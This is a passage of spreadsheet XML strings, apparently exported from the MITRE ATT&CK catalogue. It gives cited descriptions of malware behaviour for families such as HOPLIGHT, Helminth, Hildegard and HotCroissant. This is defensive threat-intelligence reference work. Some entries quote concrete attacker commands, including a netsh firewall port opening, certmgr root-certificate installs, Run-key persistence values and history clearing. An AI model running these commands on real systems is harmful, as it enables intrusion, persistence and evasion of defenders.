    <t>[HARDRAIN](https://attack.mitre.org/software/S0246) binds and listens on port 443 with a FakeTLS method.(Citation: US-CERT HARDRAIN March 2018)</t>
  </si>
  <si>
    <t>[HARDRAIN](https://attack.mitre.org/software/S0246) uses FakeTLS to communicate with its C2 server.(Citation: US-CERT HARDRAIN March 2018)</t>
  </si>
  <si>
    <t>[HARDRAIN](https://attack.mitre.org/software/S0246) uses the command &lt;code&gt;cmd.exe /c netsh firewall add portopening TCP 443 "adp"&lt;/code&gt; and makes the victim machine function as a proxy server.(Citation: US-CERT HARDRAIN March 2018)</t>
  </si>
  <si>
    <t>[HARDRAIN](https://attack.mitre.org/software/S0246) uses cmd.exe to execute &lt;code&gt;netsh&lt;/code&gt;commands.(Citation: US-CERT HARDRAIN March 2018)</t>
  </si>
  <si>
    <t>[HAWKBALL](https://attack.mitre.org/software/S0391) has encrypted data with XOR before sending it over the C2 channel.(Citation: FireEye HAWKBALL Jun 2019)</t>
  </si>
  <si>
    <t>[HAWKBALL](https://attack.mitre.org/software/S0391) has used an OLE object that uses Equation Editor to drop the embedded shellcode.(Citation: FireEye HAWKBALL Jun 2019)</t>
  </si>
  <si>
    <t>[HAWKBALL](https://attack.mitre.org/software/S0391) has sent system information and files over the C2 channel.(Citation: FireEye HAWKBALL Jun 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[HAWKBALL](https://attack.mitre.org/software/S0391) has exploited Microsoft Office vulnerabilities CVE-2017-11882 and CVE-2018-0802 to deliver the payload.(Citation: FireEye HAWKBALL Jun 2019) </t>
  </si>
  <si>
    <t>[HAWKBALL](https://attack.mitre.org/software/S0391) has the ability to delete files.(Citation: FireEye HAWKBALL Jun 2019)</t>
  </si>
  <si>
    <t>[HAWKBALL](https://attack.mitre.org/software/S0391) has leveraged several Windows API calls to create processes, gather disk information, and detect debugger activity.(Citation: FireEye HAWKBALL Jun 2019)</t>
  </si>
  <si>
    <t>[HAWKBALL](https://attack.mitre.org/software/S0391) has encrypted the payload with an XOR-based algorithm.(Citation: FireEye HAWKBALL Jun 2019)</t>
  </si>
  <si>
    <t>[HAWKBALL](https://attack.mitre.org/software/S0391) can collect the OS version, architecture information, and computer name.(Citation: FireEye HAWKBALL Jun 2019)</t>
  </si>
  <si>
    <t>[HAWKBALL](https://attack.mitre.org/software/S0391) can collect the user name of the system.(Citation: FireEye HAWKBALL Jun 2019)</t>
  </si>
  <si>
    <t>[HAWKBALL](https://attack.mitre.org/software/S0391) has used HTTP to communicate with a single hard-coded C2 server.(Citation: FireEye HAWKBALL Jun 2019)</t>
  </si>
  <si>
    <t>[HAWKBALL](https://attack.mitre.org/software/S0391) has created a cmd.exe reverse shell, executed commands, and uploaded output via the command line.(Citation: FireEye HAWKBALL Jun 2019)</t>
  </si>
  <si>
    <t>[HDoor](https://attack.mitre.org/software/S0061) kills anti-virus found on the victim.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[HDoor](https://attack.mitre.org/software/S0061) scans to identify open ports on the victim.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[HIDEDRV](https://attack.mitre.org/software/S0135) injects a DLL for [Downdelph](https://attack.mitre.org/software/S0134) into the explorer.exe process.(Citation: ESET Sednit Part 3)</t>
  </si>
  <si>
    <t>[HIDEDRV](https://attack.mitre.org/software/S0135) is a rootkit that hides certain operating system artifacts.(Citation: ESET Sednit Part 3)</t>
  </si>
  <si>
    <t>[HOMEFRY](https://attack.mitre.org/software/S0232) can perform credential dumping.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>Some strings in [HOMEFRY](https://attack.mitre.org/software/S0232) are obfuscated with XOR x56.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[HOMEFRY](https://attack.mitre.org/software/S0232) uses a command-line interface.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[HOPLIGHT](https://attack.mitre.org/software/S0376) has modified the firewall using [netsh](https://attack.mitre.org/software/S0108).(Citation: US-CERT HOPLIGHT Apr 2019)</t>
  </si>
  <si>
    <t>[HOPLIGHT](https://attack.mitre.org/software/S0376) has used its C2 channel to exfiltrate data.(Citation: US-CERT HOPLIGHT Apr 2019)</t>
  </si>
  <si>
    <t>[HOPLIGHT](https://attack.mitre.org/software/S0376) has multiple C2 channels in place in case one fails.(Citation: US-CERT HOPLIGHT Apr 2019)</t>
  </si>
  <si>
    <t>[HOPLIGHT](https://attack.mitre.org/software/S0376) has been observed enumerating system drives and partitions.(Citation: US-CERT HOPLIGHT Apr 2019)</t>
  </si>
  <si>
    <t>[HOPLIGHT](https://attack.mitre.org/software/S0376) has the ability to connect to a remote host in order to upload and download files.(Citation: US-CERT HOPLIGHT Apr 2019)</t>
  </si>
  <si>
    <t>[HOPLIGHT](https://attack.mitre.org/software/S0376) has modified Managed Object Format (MOF) files within the Registry to run specific commands and create persistence on the system.(Citation: US-CERT HOPLIGHT Apr 2019)</t>
  </si>
  <si>
    <t>[HOPLIGHT](https://attack.mitre.org/software/S0376) has connected outbound over TCP port 443 with a FakeTLS method.(Citation: US-CERT HOPLIGHT Apr 2019)</t>
  </si>
  <si>
    <t>[HOPLIGHT](https://attack.mitre.org/software/S0376) has been observed loading several APIs associated with Pass the Hash.(Citation: US-CERT HOPLIGHT Apr 2019)</t>
  </si>
  <si>
    <t>[HOPLIGHT](https://attack.mitre.org/software/S0376) has injected into running processes.(Citation: US-CERT HOPLIGHT Apr 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[HOPLIGHT](https://attack.mitre.org/software/S0376) has multiple proxy options that mask traffic between the malware and the remote operators.(Citation: US-CERT HOPLIGHT Apr 2019) 
</t>
  </si>
  <si>
    <t>A variant of [HOPLIGHT](https://attack.mitre.org/software/S0376) hooks lsass.exe, and lsass.exe then checks the Registry for the data value 'rdpproto' under the key &lt;code&gt;SYSTEM\CurrentControlSet\Control\Lsa Name&lt;/code&gt;.(Citation: US-CERT HOPLIGHT Apr 2019)</t>
  </si>
  <si>
    <t>[HOPLIGHT](https://attack.mitre.org/software/S0376) has the capability to harvest credentials and passwords from the SAM database.(Citation: US-CERT HOPLIGHT Apr 2019)</t>
  </si>
  <si>
    <t>[HOPLIGHT](https://attack.mitre.org/software/S0376) has used svchost.exe to execute a malicious DLL .(Citation: US-CERT HOPLIGHT Apr 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[HOPLIGHT](https://attack.mitre.org/software/S0376) has utilized Zlib compression to obfuscate the communications payload. (Citation: US-CERT HOPLIGHT Apr 2019) 
</t>
  </si>
  <si>
    <t>[HOPLIGHT](https://attack.mitre.org/software/S0376) has been observed collecting victim machine information like OS version, drivers, volume information and more.(Citation: US-CERT HOPLIGHT Apr 2019)</t>
  </si>
  <si>
    <t>[HOPLIGHT](https://attack.mitre.org/software/S0376) has been observed collecting system time from victim machines.(Citation: US-CERT HOPLIGHT Apr 2019)</t>
  </si>
  <si>
    <t>[HOPLIGHT](https://attack.mitre.org/software/S0376) can launch cmd.exe to execute commands on the system.(Citation: US-CERT HOPLIGHT Apr 2019)</t>
  </si>
  <si>
    <t>[HOPLIGHT](https://attack.mitre.org/software/S0376) has used WMI to recompile the Managed Object Format (MOF) files in the WMI repository.(Citation: US-CERT HOPLIGHT Apr 2019)</t>
  </si>
  <si>
    <t>[HTRAN](https://attack.mitre.org/software/S0040) can inject into into running processes.(Citation: NCSC Joint Report Public Tools)</t>
  </si>
  <si>
    <t>[HTRAN](https://attack.mitre.org/software/S0040) can proxy TCP socket connections to obfuscate command and control infrastructure.(Citation: Operation Quantum Entanglement)(Citation: NCSC Joint Report Public Tools)</t>
  </si>
  <si>
    <t>[HTRAN](https://attack.mitre.org/software/S0040) can install a rootkit to hide network connections from the host OS.(Citation: NCSC Joint Report Public Tools)</t>
  </si>
  <si>
    <t>[HTTPBrowser](https://attack.mitre.org/software/S0070) abuses the Windows DLL load order by using a legitimate Symantec anti-virus binary, VPDN_LU.exe, to load a malicious DLL that mimics a legitimate Symantec DLL, navlu.dll.(Citation: ZScaler Hacking Team)</t>
  </si>
  <si>
    <t>[HTTPBrowser](https://attack.mitre.org/software/S0070) has used DLL side-loading.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>[HTTPBrowser](https://attack.mitre.org/software/S0070) has used DNS for command and control.(Citation: Dell TG-3390)(Citation: ThreatStream Evasion Analysis)</t>
  </si>
  <si>
    <t>[HTTPBrowser](https://attack.mitre.org/software/S0070) deletes its original installer file once installation is complete.(Citation: ZScaler Hacking Team)</t>
  </si>
  <si>
    <t>[HTTPBrowser](https://attack.mitre.org/software/S0070) is capable of listing files, folders, and drives on a victim.(Citation: Dell TG-3390)(Citation: ZScaler Hacking Team)</t>
  </si>
  <si>
    <t>[HTTPBrowser](https://attack.mitre.org/software/S0070) is capable of writing a file to the compromised system from the C2 server.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>[HTTPBrowser](https://attack.mitre.org/software/S0070) is capable of capturing keystrokes on victims.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>[HTTPBrowser](https://attack.mitre.org/software/S0070)'s installer contains a malicious file named navlu.dll to decrypt and run the RAT. navlu.dll is also the name of a legitimate Symantec DLL.(Citation: ZScaler Hacking Team)</t>
  </si>
  <si>
    <t>[HTTPBrowser](https://attack.mitre.org/software/S0070)'s code may be obfuscated through structured exception handling and return-oriented programming.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>[HTTPBrowser](https://attack.mitre.org/software/S0070) has established persistence by setting the &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; key value for &lt;code&gt;wdm&lt;/code&gt; to the path of the executable. It has also used the Registry entry &lt;code&gt;HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run vpdn “%ALLUSERPROFILE%\%APPDATA%\vpdn\VPDN_LU.exe”&lt;/code&gt; to establish persistence.(Citation: ZScaler Hacking Team)(Citation: ThreatStream Evasion Analysis)</t>
  </si>
  <si>
    <t>[HTTPBrowser](https://attack.mitre.org/software/S0070) has used HTTP and HTTPS for command and control.(Citation: Dell TG-3390)(Citation: ThreatStream Evasion Analysis)</t>
  </si>
  <si>
    <t>[HTTPBrowser](https://attack.mitre.org/software/S0070) is capable of spawning a reverse shell on a victim.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>[Hacking Team UEFI Rootkit](https://attack.mitre.org/software/S0047) is a UEFI BIOS rootkit developed by the company Hacking Team to persist remote access software on some targeted systems.(Citation: TrendMicro Hacking Team UEFI)</t>
  </si>
  <si>
    <t>System Firmware</t>
  </si>
  <si>
    <t xml:space="preserve">[Hacking Team UEFI Rootkit](https://attack.mitre.org/software/S0047) is a UEFI BIOS rootkit developed by the company Hacking Team to persist remote access software on some targeted systems.(Citation: TrendMicro Hacking Team UEFI) </t>
  </si>
  <si>
    <t>[Hancitor](https://attack.mitre.org/software/S0499) has decoded Base64 encoded URLs to insert a recipient’s name into the filename of the Word document. [Hancitor](https://attack.mitre.org/software/S0499) has also extracted executables from ZIP files.(Citation: Threatpost Hancitor)(Citation: FireEye Hancitor)</t>
  </si>
  <si>
    <t>[Hancitor](https://attack.mitre.org/software/S0499) has deleted files using the VBA &lt;code&gt;kill&lt;/code&gt; function.(Citation: FireEye Hancitor)</t>
  </si>
  <si>
    <t>[Hancitor](https://attack.mitre.org/software/S0499) has the ability to download additional files from C2.(Citation: Threatpost Hancitor)</t>
  </si>
  <si>
    <t>[Hancitor](https://attack.mitre.org/software/S0499) has used malicious Microsoft Word documents, sent via email, which prompted the victim to enable macros.(Citation: FireEye Hancitor)</t>
  </si>
  <si>
    <t>[Hancitor](https://attack.mitre.org/software/S0499) has relied upon users clicking on a malicious link delivered through phishing.(Citation: Threatpost Hancitor)</t>
  </si>
  <si>
    <t>[Hancitor](https://attack.mitre.org/software/S0499) has used &lt;code&gt;CallWindowProc&lt;/code&gt; and &lt;code&gt;EnumResourceTypesA&lt;/code&gt; to interpret and execute shellcode.(Citation: FireEye Hancitor)</t>
  </si>
  <si>
    <t>[Hancitor](https://attack.mitre.org/software/S0499) has used Base64 to encode malicious links. [Hancitor](https://attack.mitre.org/software/S0499) has also delivered compressed payloads in ZIP files to victims.(Citation: Threatpost Hancitor)(Citation: FireEye Hancitor)</t>
  </si>
  <si>
    <t>[Hancitor](https://attack.mitre.org/software/S0499) has used PowerShell to execute commands.(Citation: FireEye Hancitor)</t>
  </si>
  <si>
    <t>[Hancitor](https://attack.mitre.org/software/S0499)  has added Registry Run keys to establish persistence.(Citation: FireEye Hancitor)</t>
  </si>
  <si>
    <t>[Hancitor](https://attack.mitre.org/software/S0499) has been delivered via phishing emails with malicious attachments.(Citation: FireEye Hancitor)</t>
  </si>
  <si>
    <t>[Hancitor](https://attack.mitre.org/software/S0499) has been delivered via phishing emails which contained malicious links.(Citation: Threatpost Hancitor)</t>
  </si>
  <si>
    <t>Verclsid</t>
  </si>
  <si>
    <t>[Hancitor](https://attack.mitre.org/software/S0499) has used verclsid.exe to download and execute a malicious script.(Citation: Red Canary Verclsid.exe)</t>
  </si>
  <si>
    <t>[Hancitor](https://attack.mitre.org/software/S0499) has used a macro to check that an ActiveDocument shape object in the lure message is present. If this object is not found, the macro will exit without downloading additional payloads.(Citation: FireEye Hancitor)</t>
  </si>
  <si>
    <t>[Havij](https://attack.mitre.org/software/S0224) is used to automate SQL injection.(Citation: Check Point Havij Analysis)</t>
  </si>
  <si>
    <t>A [Helminth](https://attack.mitre.org/software/S0170) VBScript receives a batch script to execute a set of commands in a command prompt.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>The executable version of [Helminth](https://attack.mitre.org/software/S0170) has a module to log clipboard contents.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>[Helminth](https://attack.mitre.org/software/S0170) samples have been signed with legitimate, compromised code signing certificates owned by software company AI Squared.(Citation: ClearSky OilRig Jan 2017)</t>
  </si>
  <si>
    <t>[Helminth](https://attack.mitre.org/software/S0170) can use DNS for C2.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>[Helminth](https://attack.mitre.org/software/S0170) splits data into chunks up to 23 bytes and sends the data in DNS queries to its C2 server.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>[Helminth](https://attack.mitre.org/software/S0170) has checked for the domain admin group and Exchange Trusted Subsystem groups using the commands &lt;code&gt;net group Exchange Trusted Subsystem /domain&lt;/code&gt; and &lt;code&gt;net group domain admins /domain&lt;/code&gt;.(Citation: Unit 42 Playbook Dec 2017)</t>
  </si>
  <si>
    <t>[Helminth](https://attack.mitre.org/software/S0170) can download additional files.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>The executable version of [Helminth](https://attack.mitre.org/software/S0170) has a module to log keystrokes.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>[Helminth](https://attack.mitre.org/software/S0170) creates folders to store output from batch scripts prior to sending the information to its C2 server.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>[Helminth](https://attack.mitre.org/software/S0170) has checked the local administrators group.(Citation: Unit 42 Playbook Dec 2017)</t>
  </si>
  <si>
    <t>The [Helminth](https://attack.mitre.org/software/S0170) config file is encrypted with RC4.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>One version of [Helminth](https://attack.mitre.org/software/S0170) uses a PowerShell script.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>[Helminth](https://attack.mitre.org/software/S0170) has used [Tasklist](https://attack.mitre.org/software/S0057) to get information on processes.(Citation: Unit 42 Playbook Dec 2017)</t>
  </si>
  <si>
    <t>[Helminth](https://attack.mitre.org/software/S0170) establishes persistence by creating a shortcut in the Start Menu folder.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>[Helminth](https://attack.mitre.org/software/S0170) has used a scheduled task for persistence.(Citation: ClearSky OilRig Jan 2017)</t>
  </si>
  <si>
    <t>[Helminth](https://attack.mitre.org/software/S0170) establishes persistence by creating a shortcut.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>For C2 over HTTP, [Helminth](https://attack.mitre.org/software/S0170) encodes data with base64 and sends it via the "Cookie" field of HTTP requests. For C2 over DNS, [Helminth](https://attack.mitre.org/software/S0170) converts ASCII characters into their hexadecimal values and sends the data in cleartext.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>[Helminth](https://attack.mitre.org/software/S0170) encrypts data sent to its C2 server over HTTP with RC4.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>One version of [Helminth](https://attack.mitre.org/software/S0170) consists of VBScript scripts.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>[Helminth](https://attack.mitre.org/software/S0170) can use HTTP for C2.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>[Helminth](https://attack.mitre.org/software/S0170) can provide a remote shell. One version of [Helminth](https://attack.mitre.org/software/S0170) uses batch scripting.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>[Hi-Zor](https://attack.mitre.org/software/S0087) encrypts C2 traffic with TLS.(Citation: Fidelis Hi-Zor)</t>
  </si>
  <si>
    <t>[Hi-Zor](https://attack.mitre.org/software/S0087) deletes its RAT installer file as it executes its DLL payload file.(Citation: Fidelis INOCNATION)</t>
  </si>
  <si>
    <t>[Hi-Zor](https://attack.mitre.org/software/S0087) has the ability to upload and download files from its C2 server.(Citation: Fidelis INOCNATION)</t>
  </si>
  <si>
    <t>[Hi-Zor](https://attack.mitre.org/software/S0087) uses various XOR techniques to obfuscate its components.(Citation: Fidelis INOCNATION)</t>
  </si>
  <si>
    <t>[Hi-Zor](https://attack.mitre.org/software/S0087) creates a Registry Run key to establish persistence.(Citation: Fidelis INOCNATION)</t>
  </si>
  <si>
    <t>[Hi-Zor](https://attack.mitre.org/software/S0087) executes using regsvr32.exe called from the [Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/001) persistence mechanism.(Citation: Fidelis INOCNATION)</t>
  </si>
  <si>
    <t>[Hi-Zor](https://attack.mitre.org/software/S0087) encrypts C2 traffic with a double XOR using two distinct single-byte keys.(Citation: Fidelis Hi-Zor)</t>
  </si>
  <si>
    <t>[Hi-Zor](https://attack.mitre.org/software/S0087) communicates with its C2 server over HTTPS.(Citation: Fidelis INOCNATION)</t>
  </si>
  <si>
    <t>[Hi-Zor](https://attack.mitre.org/software/S0087) has the ability to create a reverse shell.(Citation: Fidelis INOCNATION)</t>
  </si>
  <si>
    <t>[HiddenWasp](https://attack.mitre.org/software/S0394) uses a cipher to implement a decoding function.(Citation: Intezer HiddenWasp Map 2019)</t>
  </si>
  <si>
    <t>[HiddenWasp](https://attack.mitre.org/software/S0394) adds itself as a shared object to the LD_PRELOAD environment variable.(Citation: Intezer HiddenWasp Map 2019)</t>
  </si>
  <si>
    <t>[HiddenWasp](https://attack.mitre.org/software/S0394) downloads a tar compressed archive from a download server to the system.(Citation: Intezer HiddenWasp Map 2019)</t>
  </si>
  <si>
    <t>[HiddenWasp](https://attack.mitre.org/software/S0394) creates a user account as a means to provide initial persistence to the compromised machine.(Citation: Intezer HiddenWasp Map 2019)</t>
  </si>
  <si>
    <t>[HiddenWasp](https://attack.mitre.org/software/S0394) communicates with a simple network protocol over TCP.(Citation: Intezer HiddenWasp Map 2019)</t>
  </si>
  <si>
    <t>[HiddenWasp](https://attack.mitre.org/software/S0394) encrypts its configuration and payload.(Citation: Intezer HiddenWasp Map 2019)</t>
  </si>
  <si>
    <t>RC Scripts</t>
  </si>
  <si>
    <t>[HiddenWasp](https://attack.mitre.org/software/S0394) installs reboot persistence by adding itself to &lt;code&gt;/etc/rc.local&lt;/code&gt;.(Citation: Intezer HiddenWasp Map 2019)</t>
  </si>
  <si>
    <t>[HiddenWasp](https://attack.mitre.org/software/S0394) uses a rootkit to hook and implement functions on the system.(Citation: Intezer HiddenWasp Map 2019)</t>
  </si>
  <si>
    <t>[HiddenWasp](https://attack.mitre.org/software/S0394) uses an RC4-like algorithm with an already computed PRGA generated key-stream for network communication.(Citation: Intezer HiddenWasp Map 2019)</t>
  </si>
  <si>
    <t>[HiddenWasp](https://attack.mitre.org/software/S0394) uses a script to automate tasks on the victim's machine and to assist in execution.(Citation: Intezer HiddenWasp Map 2019)</t>
  </si>
  <si>
    <t>[Hikit](https://attack.mitre.org/software/S0009) has attempted to disable driver signing verification by tampering with several Registry keys prior to the loading of a rootkit driver component.(Citation: FireEye HIKIT Rootkit Part 2)</t>
  </si>
  <si>
    <t>[Hikit](https://attack.mitre.org/software/S0009) has used [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001) to load &lt;code&gt;oci.dll&lt;/code&gt; as a persistence mechanism.(Citation: FireEye Hikit Rootkit)</t>
  </si>
  <si>
    <t>[Hikit](https://attack.mitre.org/software/S0009) uses &lt;code&gt;certmgr.exe -add GlobalSign.cer -c -s -r localMachine Root&lt;/code&gt; and &lt;code&gt;certmgr.exe -add GlobalSign.cer -c -s -r localMachineTrustedPublisher&lt;/code&gt; to install a self-generated certificate to the local trust store as a root CA and Trusted Publisher.(Citation: FireEye HIKIT Rootkit Part 2)</t>
  </si>
  <si>
    <t>[Hikit](https://attack.mitre.org/software/S0009) supports peer connections.(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t xml:space="preserve">[Hikit](https://attack.mitre.org/software/S0009) is a [Rootkit](https://attack.mitre.org/techniques/T1014) that has been used by [Axiom](https://attack.mitre.org/groups/G0001).(Citation: FireEye Hikit Rootkit) (Citation: FireEye HIKIT Rootkit Part 2) </t>
  </si>
  <si>
    <t>[Hikit](https://attack.mitre.org/software/S0009) performs XOR encryption.(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t>[Hikit](https://attack.mitre.org/software/S0009) has used HTTP for C2.(Citation: FireEye HIKIT Rootkit Part 2)</t>
  </si>
  <si>
    <t>[Hikit](https://attack.mitre.org/software/S0009) has the ability to create a remote shell and run given commands.(Citation: FireEye HIKIT Rootkit Part 2)</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has used an IRC channel for C2 communications.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>Clear Command History</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has used history -c to clear script shell logs.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>Cloud Instance Metadata API</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has queried the Cloud Instance Metadata API for cloud credentials.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) was executed through the kubelet API run command and by executing commands on running containers.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t xml:space="preserve">[Hildegard](https://attack.mitre.org/software/S0601) has used masscan to search for kubelets and the kubelet API for additional running containers.(Citation: Unit 42 Hildegard Malware) </t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has searched for SSH keys, Docker credentials, and Kubernetes service tokens.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has decrypted ELF files with AES.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has modified DNS resolvers to evade DNS monitoring tools.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has modified /etc/ld.so.preload to intercept shared library import functions.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t xml:space="preserve">[Hildegard](https://attack.mitre.org/software/S0601) has used the BOtB tool that can break out of containers. (Citation: Unit 42 Hildegard Malware) </t>
  </si>
  <si>
    <t xml:space="preserve">[Hildegard](https://attack.mitre.org/software/S0601) has used the BOtB tool which exploits CVE-2019-5736.(Citation: Unit 42 Hildegard Malware) </t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) was executed through an unsecure kubelet that allowed anonymous access to the victim environment.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t xml:space="preserve">[Hildegard](https://attack.mitre.org/software/S0601) has deleted scripts after execution.(Citation: Unit 42 Hildegard Malware) </t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has downloaded additional scripts that build and run Monero cryptocurrency miners.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has created a user named “monerodaemon”.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has disguised itself as a known Linux process.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has used masscan to look for kubelets in the internal Kubernetes network.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has encrypted an ELF file.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has searched for private keys in .ssh.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has established tmate sessions for C2 communications.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has used xmrig to mine cryptocurrency.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has modified /etc/ld.so.preload to overwrite readdir() and readdir64().(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has packed ELF files into other binaries.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has collected the host's OS, CPU, and memory information.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has started a monero service.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has used shell scripts for execution.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) has downloaded scripts from GitHub.(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to list the names of all open windows on the infected host.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to download files from the infected host to the command and control (C2) server.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to clean up installed files, delete files, and delete itself from the victim’s machine.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to retrieve a list of files in a given directory as well as drives and drive types.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to hide the window for operations performed on a given file.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to upload a file from the command and control (C2) server to the victim machine.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) can perform dynamic DLL importing and API lookups using &lt;code&gt;LoadLibrary&lt;/code&gt; and &lt;code&gt;GetProcAddress&lt;/code&gt; on obfuscated strings.(Citation: US-CERT HOTCROISSANT February 2020)</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has encrypted strings with single-byte XOR and base64 encoded RC4.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to list running processes on the infected host.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has attempted to install a scheduled task named “Java Maintenance64” on startup to establish persistence.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to do real time screen viewing on an infected host.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to stop services on the infected host.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) can retrieve a list of applications from the &lt;code&gt;SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths&lt;/code&gt; registry key.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has used the open source UPX executable packer.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has compressed network communications and encrypted them with a custom stream cipher.(Citation: Carbon Black HotCroissant April 2020)(Citation: US-CERT HOTCROISSANT February 2020)</t>
  </si>
  <si>
